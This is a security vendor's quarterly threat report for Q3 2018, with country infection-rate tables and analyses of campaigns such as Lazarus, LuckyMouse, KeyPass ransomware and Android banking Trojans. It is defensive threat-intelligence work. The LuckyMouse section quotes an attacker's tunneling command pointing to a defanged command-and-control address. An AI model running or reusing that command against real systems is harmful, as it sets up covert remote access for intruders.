Страна* %** 1 Venezuela 35.88 2 Albania 32.48 3 Algeria 32.41 4 Belarus 31.08 5 Armenia 29.16 6 Ukraine 28.67 7 Moldova 28.64 8 Azerbaijan 26.67 9 Kyrgyzstan 25.80 10 Serbia 25.38 11 Mauritania 24.89 12 Indonesia 24.68 13 Romania 24.56 14 Qatar 23.99 15 Kazakhstan 23.93 16 Philippines 23.84 17 Lithuania 23.70 18 Djibouti 23.70 19 Latvia 23.09 20 Honduras 22.97

* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded.
** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 18.92% of internet users’ computers worldwide experienced at least one malware-class web attack.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of malicious web attacks in Q3 2018 (download)

Local threats

Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers – flash drives, camera memory cards, phones and external hard drives.

In Q3 2018, Kaspersky Lab’s file antivirus detected 239,177,356 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* %** 1 Uzbekistan 54.93 2 Afghanistan 54.15 3 Yemen 52.12 4 Turkmenistan 49.61 5 Tajikistan 49.05 6 Laos 47.93 7 Syria 47.45 8 Vietnam 46.07 9 Bangladesh 45.93 10 Sudan 45.30 11 Ethiopia 45.17 12 Myanmar 44.61 13 Mozambique 42.65 14 Kyrgyzstan 42.38 15 Iraq 42.25 16 Rwanda 42.06 17 Algeria 41.95 18 Cameroon 40.98 19 Malawi 40.70 20 Belarus 40.66

* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded.
** Unique users on whose computers malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of malicious web attacks in Q3 2018 (download)

On average, 22.53% of computers globally faced at least one malware-class local threat in Q3.

IT threat evolution Q3 2018

Mon, 11/12/2018 - 05:00

Targeted attacks and malware campaigns Lazarus targets cryptocurrency exchange

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global cryptocurrency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized cryptocurrency trading application that had been recommended to the company over email.

An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again.

It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack.

The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It would seem that in the chase after advanced users, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms.

This campaign should be a lesson to all of us and a warning to businesses relying on third-party software. Do not automatically trust the code running on your systems. Neither a good-looking website, nor a solid company profile, nor digital certificates guarantee the absence of backdoors. Trust has to be earned and proven.

You can read our Operation AppleJeus report here.

LuckyMouse

Since March 2018, we have found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.

The campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. We believe that the Chinese-speaking threat actor LuckyMouse is responsible for this campaign. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (“-s rssocks -d 103.75.190[.]28 -e 443”) creates a tunnel to a previously known LuckyMouse command-and-control (C2) server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor.

The malware consists of three modules: a custom C++ installer, the NDISProxy network filtering driver and a C++ Trojan:

We have not seen any indications of spear phishing or watering hole activity. We think the attackers spread their infectors through networks that were already compromised.

The Trojan is a full-featured RAT capable of executing common tasks such as command execution, and downloading and uploading files. The attackers use it to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and is popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so that the C2 is able to send commands.

You can read our LuckyMouse report here.

Financial fraud on an industrial scale

Usually, attacks on industrial enterprises are associated with cyber-espionage or sabotage. However, we recently discovered a phishing campaign designed to steal money from such organizations – primarily manufacturing companies.

The attackers use standard phishing techniques to lure their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals use legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, then scan for information on current purchases, and financial and accounting software. The attackers then use different ploys to steal company money – for example, by replacing the banking details in transactions. At the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that even when threat actors use simple techniques and known malware they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions. Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of company employees and record audio and video using devices connected to infected machines. While the series of attacks targets primarily Russian organizations, the same tactics and tools could be successfully used in attacks against industrial companies anywhere.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Malware stories Exploiting the digital gold rush

For some time now, we’ve been tracking a dramatic decline in ransomware and a massive growth in cryptocurrency mining. The number of people who encountered miners grew from 1,899,236 in 2016-17 to 2,735,611 in 2017-18. This is clearly because it’s a lucrative activity for cybercriminals – we estimate that mining botnets generated more than $7,000,000 in the second half of 2017. Not only are we seeing purpose-built cryptocurrency miners, we’re also seeing existing malware adding this functionality to their arsenal.

The ransomware Trojan Rakhni is a case in point. The malware loader chooses which component to install depending on the device. The malware, which we have seen in Russia, Kazakhstan, Ukraine, Germany and India, is distributed through spam mailings with malicious attachments. One of the samples we analysed masquerades as a financial document. When loaded, this appears to be a document viewer. The malware displays an error message explaining why nothing has opened. It then disables Windows Defender and installs forged digital certificates.


The malware checks to see if there are Bitcoin-related folders on the computer. If there are, it encrypts files and demands a ransom. If not, it installs a cryptocurrency miner. Finally, the malware tries to spread to other computers within the network. You can read our analysis of Rakhni here.

Cybercriminals don’t just use malware to cash in on the growing interest in cryptocurrencies; they also use established social engineering techniques to trick people out of their digital money. This includes sending links to phishing scams that mimic the authorization pages of popular crypto exchanges, to trick their victims into giving the scammers access to their crypto exchange account – and their money. In the first half of 2018, we saw 100,000 of these attempts to redirect people to such fake pages.

The same approach is used to gain access to online wallets, where the ‘hook’ is a warning that the victim will lose money if they don’t go through a formal identification process – the attackers, of course, harvest the details entered by the victim. This method works just as well where the victim is using an offline wallet stored on their computer.

Scammers also try to use the speculation around cryptocurrencies to trick people who don’t have a wallet: they lure them to fake crypto wallet sites, promising registration bonuses, including cryptocurrency. In some cases, they harvest personal data and redirect the victim to a legitimate site. In others, they open a real wallet for the victim, which is compromised from the outset. Online wallets and exchanges aren’t the only focus of the scammers; we have also seen spoof versions of services designed to facilitate transactions with digital coins stored on the victim’s computer.

Earlier this year, we provided some advice on choosing a crypto wallet.

We recently discovered a cryptocurrency miner, named PowerGhost, focused mainly on workstations and servers inside corporate networks – thereby hoping to commandeer the power of multiple processors in one fell swoop. It’s not uncommon to see cybercriminals infect clean software with a malicious miner to promote the spread of their malware. However, the creators of PowerGhost went further, using fileless methods to establish it in a compromised network. PowerGhost tries to log in to network user accounts using WMI (Windows Management Instrumentation), obtaining logins and passwords using the Mimikatz data extraction tool. The malware can also be distributed using the EternalBlue exploit (used last year in the WannaCry and ExPetr outbreaks). Once a device has been infected, PowerGhost tries to enhance its privileges using operating system vulnerabilities. Most of the attacks we’ve seen so far have been in India, Turkey, Brazil and Colombia.

KeyPass ransomware

The number of ransomware attacks has been declining in the last year or so. Nevertheless, this type of malware remains a problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the ‘KeyPass‘ Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East.

We believe that the criminals behind KeyPass use fake installers that download the malware.

KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’, and ransom notes called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’ are saved in each directory containing encrypted files.

The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file.

Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the JSON format. If the C2 is unavailable – for example, the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, decryption of the victim’s files will be trivial.

Probably the most interesting feature of the KeyPass Trojan is its ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

Sextortion with a twist

Scams come in many forms, but the people behind them are always on the lookout for ways to lend credibility to the scam and maximise their opportunity to make money. One recent ‘sextortion’ scam uses stolen passwords for this purpose. The victim receives an email message claiming that their computer has been compromised and that the attacker has recorded a video of them watching pornographic material. The attackers threaten to send a copy of the video to the victim’s contacts unless they pay a ransom within 24 hours. The ransom demand is $1,400, payable in bitcoins.

The scammer includes a legitimate password in the message, in a bid to convince the victim that they have indeed been compromised. It seems that the passwords used are real, although in some cases at least they are very old. The passwords were probably obtained in an underground market and came from an earlier data breach.

The hunt for corporate passwords

It’s not just individuals who are targeted by phishing attacks – starting from early July, we saw malicious spam activity targeting corporate mailboxes. The messages contained an attachment with an .ISO extension that we detect as Loki Bot. The objective of the malware is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets, and then to forward the data to the criminals behind the attacks.

The messages are diverse in nature. They include fake notifications from well-known companies:

Or fake orders or offers:

The scammers pass off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually consisting of no more than a few lines and the subject mentioning the fake attachment.

Each year we see an increase in spam attacks on the corporate sector aimed at obtaining confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why it’s essential for corporate security strategy to include both technical protection and staff education – to stop them becoming the entry-point for a cyberattack.

Botnets: the big picture

Spam mailshots with links to malware, and bots downloading other malware, are just two botnet deployment scenarios. The choice of payload is limited only by the imagination of the botnet operator or their customers. It might be ransomware, a banker, a miner, a backdoor, etc. Every day we intercept numerous file download commands sent to bots of various types and families. We recently presented the results of our analysis of botnet activity for H2 2017 and H1 2018.

Here are the main trends that we identified by analyzing the files downloaded by bots:

  • The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for cryptocurrency mining.
  • The number of downloaded droppers is also on the rise, reflecting the fact that attacks are multi-stage and growing in complexity.
  • The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers.
  • Increasingly, botnets are leased according to the needs of the customer, so in many cases it is difficult to pinpoint the ‘specialization’ of the botnet.
Using USB devices to spread malware

USB devices, which have been around for almost 20 years, offer an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors – most notably in the case of the state-sponsored threat Stuxnet, which used USB devices to inject malware into the network of an Iranian nuclear facility.

These days the use of USB devices as a business tool is declining, and there is greater awareness of the security risks associated with them. Nevertheless, millions of USB devices are still produced for use at home, in businesses and in marketing promotion campaigns such as trade show giveaways. So they remain a target for attackers.

Kaspersky Lab data for 2017 showed that one in four people worldwide were affected by a local cyber-incident, i.e. one not related to the internet. These attacks are detected directly on a victim’s computer and include infections caused by removable media such as USB devices.

We recently published a review of the current cyberthreat landscape for removable media, particularly USBs, and offered advice and recommendations for protecting these little devices and the data they carry.

Here is a summary of our findings.

  • USB devices and other removable media have been used to spread cryptocurrency mining software since at least 2015. Some victims were found to have been carrying the infection for years.
  • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
  • Every tenth person infected via removable media in 2018 was targeted with this cryptocurrency miner: around 9.22% – up from 6.7% in 2017 and 4.2% in 2016.
  • Other malware spread through removable media includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
  • The Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
  • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
  • Dark Tequila, a complex banking malware reported in August 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.
New trends in the world of IoT threats

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning.

Malware for smart devices is increasing not only in quantity but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine cryptocurrency.

You can read our report on IoT threats here, including tips on how to reduce the risk of smart devices being infected.

A look at the Asacub mobile banking Trojan

The first version of Asacub, which we saw in June 2015, was a basic phishing app: it was able to send a list of the victim’s apps, browser history and contact list to a remote C2 server, send SMS messages to a specific phone number and turn off the screen on demand. This mobile Trojan has evolved since then, off the back of a large-scale distribution campaign by its creators in spring and summer 2017), helping it to claim top spot in last year’s ranking of mobile banking Trojans – out-performing other families such as Svpeng and Faketoken. The Trojan has claimed victims in a number of countries, but the latest version steals money from owners of Android devices connected to the mobile banking service of one of Russia’s largest banks.

The malware is spread via an SMS messages containing a link and an offer to view a photo or MMS message. The link directs the victim to a web page containing a similar sentence and a button for downloading the Trojan APK file to the device.

Asacub masquerades as an MMS app or a client of a popular free ads service.

Once installed, the Trojan starts to communicate with the C2 server. Data is transferred in JSON format and includes information about the victim’s device – smartphone model, operating system, mobile operator and Trojan version.

Asacub is able to withdraw funds from a bank card linked to the phone by sending an SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS messages from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS messages and send them to the required number. What’s more, the victim can’t subsequently check the balance via mobile banking or change any settings, because after receiving a command with the code 40, the Trojan prevents the banking app from running on the phone.

You can read more here.

BusyGasper – the unfriendly spy

Early in 2018, our mobile intruder detection technology was triggered by a suspicious Android sample that turned out to belong to a new spyware family that we named BusyGasper. The malware isn’t sophisticated, but it does demonstrate some unusual features for this type of threat. BusyGasper is a unique spy implant with stand-out features such as device sensor listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver. Like other modern Android spyware, it is capable of exfiltrating data from messaging applications – WhatsApp, Viber and Facebook. It also includes some keylogging tools – the malware processes every user tap, gathering its co-ordinates and calculating characters by matching given values with hardcoded ones.

The malware has a multi-component structure and can download a payload or updates from its C2 server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol, which is rarely seen among Android malware. In addition, it can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.

There is a hidden menu for controlling the different implants that seems to have been created for manual operator control. To activate the menu, the operator needs to call the hardcoded number 9909 from an infected device.

The operator can use this interface to type any command. It also shows a current malware log.

This particular operation has been active since May. We have found no evidence of spear phishing or other common infection method. Some clues, such as the existence of a hidden menu mentioned above, suggest a manual installation method – the attackers gaining physical access to a victim’s device in order to install the malware. This would explain the number of victims – less than 10 in total, all located in the Russia. There are no similarities to commercial spyware products or to other known spyware variants, which suggests that BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low OPSEC level could indicate that less skilled attackers are behind the malware.

Thinking outside the [sand]box

One of the security principles built into the Android operating system is that all apps must be isolated from one another. Each app, along with its private files, operate in ‘sandbox’ that can’t be accessed by other apps. The point is to ensure that, even if a malicious app infiltrates your device, it’s unable to access data held by legitimate apps – for example, the username and password for your online banking app, or your message history. Unsurprisingly, hackers try to find ways to circumvent this protection mechanism.

In August, at DEF CON 26, Checkpoint researcher, Slava Makkaveev, discussed a new way of escaping the Android sandbox, dubbed a ‘Man-in-the-Disk’ attack.

Android also has a shared external storage, named External Storage. Apps must ask the device owner for permission to access this storage area – the privileges required are not normally considered dangerous, and nearly every app asks for them, so there is nothing suspicious about the request per se. External storage is used for lots of useful things, such as to exchange files or transfer files between a smartphone and a computer. However, external storage is also often used for temporarily storing data downloaded from the internet. The data is first written to the shared part of the disk, and then transferred to an isolated area that only that particular app can access. For example, an app may temporarily use the area to store supplementary modules that it installs to expand its functionality, additional content such as dictionaries, or updates.

The problem is that any app with read/write access to the external storage can gain access to the files and modify them, adding something malicious. In a real-life scenario, you may install a seemingly harmless app, such as a game, that may nevertheless infect your smartphone with malware. Slava Makkaveev gave several examples in his DEF CON presentation.

Google researchers discovered that the same method of attack could be applied to the Android version of the popular game, Fortnite. To download the game, players need to install a helper app first, and it is supposed to download the game files. However, using the Man-in-the-Disk attack, someone can trick the helper into installing a malicious app. Fortnite developers – Epic Games – have already issued a new version of the installer. So, if you’re a Fortnite player, use version 2.1.0 or later to be sure that you’re safe. If you have Fortnite already installed, uninstall it and then reinstall it from scratch using the new version.

How safe are car sharing apps?

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using these services?

The obvious reason why cybercriminals might be interested in car sharing is because they want to ride in someone’s car at someone else’s expense. But this could be the least likely scenario – it’s a crime that requires a physical point of presence and there are ways to cross check if the person who makes the booking is the one who gets the ride. The selling of hijacked accounts might be a more viable reason – driven by demand from those who don’t have a driving license or who have been refused registration by the car sharing service’s security team. Offers of this nature already exist on the market. In addition, if someone manages to hijack someone else’s car sharing account, they can track all their trips and steal things that are left behind in the car. Finally, a car that is fraudulently rented in somebody else’s name can always be driven to some remote place and cannibalized for spare parts, or used for criminal activity.

We tested 13 apps to see if their developers have considered security.

First, we checked to see if the apps could be launched on an Android device with root privileges and to see how well the code is obfuscated. This is important because most Android apps can be decompiled, their code modified (for example, so that user credentials are sent to a C2 server), then re-assembled, signed with a new certificate and uploaded again to an app store. An attacker on a rooted device can infiltrate the app’s process and gain access to authentication data.

Second, we checked to see if it was possible to create a username and password when using a service. Many services use a person’s phone number as their username. This is quite easy for cybercriminals to obtain as people often forget to hide it on social media, while car sharing customers can be identified on social media by their hashtags and photos.

Third, we looked at how the apps work with certificates and if cybercriminals have any chance of launching successful Man-in-the-Middle attacks. We also checked how easy it is to overlay an app’s interface with a fake authorization window.

The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analysed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not only very similar to each other but are actually based on the same code.

You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.